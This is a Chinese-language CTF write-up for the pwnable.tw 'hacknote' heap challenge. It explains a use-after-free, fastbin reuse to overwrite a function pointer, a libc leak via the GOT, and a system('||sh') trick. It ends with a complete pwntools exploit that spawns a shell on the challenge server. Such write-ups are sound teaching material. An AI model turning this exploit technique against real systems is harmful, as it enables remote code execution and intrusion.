一道适合入门的堆利用题目

需要事先了解 malloc 相关的堆分配机制（fastbin，normal bin等）

先用ida 分析以下，有add，delete，print 3个主要功能，一个note 会分配8个字节，前四字节指向print功能所要调用的函数，后四节指向note中的具体内容。

漏洞比较明显，在delete的时候，没有将指针置为Null，可创造一个迷途指针，从而进行UAF。

基本的思路是先add 两次，但是内容的大小不能是8字节，不然会分配 4个 16字节的fast bin；然后再delete两次，此时 fast bin链表如图：

此时add 第三个note，并输入内容大小为8，由于fast bin 采用LIFO原则，会取出note1的16字节 存放新note的结构体，取出note0 的16字节 存放新的内容，此时得到了修改note0结构体的机会，可把note0的前4字节改为我们想执行的函数地址；完成之后，我们执行print(0),函数就会执行。

由于题目提供了libc，我们可以先触发一次漏洞来泄露地址，然后再触发一次漏洞来执行system。

这里有个问题就是system函数的参数，传入该函数的参数是note0结构体自身，无法直接穿如字符串“\bin\sh”,这里的知识点是system参数可用“||”截断，比如 system("hsasoijiojo||/bin/sh")

最终的payload

from pwn import *

    con=remote("chall.pwnable.tw", 10102)

    e=ELF("hacknote")

    elib=ELF("libc_32.so.6")

    puts_got=0x804a024#e.got["puts"]

    printn=0x804862b

def addNote(size,content):

    con.recvuntil("choice :")

    con.sendline("1")

    con.recvuntil("size :")

    con.sendline(str(size))

    con.recvuntil("Content :")

    con.sendline(content)

def deleteNote(index):

    con.recvuntil("choice :")

    con.sendline("2")

    con.recvuntil("Index :")

    con.sendline(str(index))

def printNote(index):

    con.recvuntil("choice :")

    con.sendline("3")

    con.recvuntil("Index :")

    con.sendline(str(index))

addNote(24,24*"a")

addNote(24,24*"a")

deleteNote(0)

deleteNote(1)

addNote(8,p32(printn)+p32(puts_got))

printNote(0)

p=con.recv()

puts_addr=u32(p[:4])

d_value=elib.symbols["puts"]-elib.symbols["system"]

sys_addr=puts_addr-d_value

deleteNote(2)

addNote(8,flat([sys_addr,"||sh"]))

printNote(0)

con.interactive()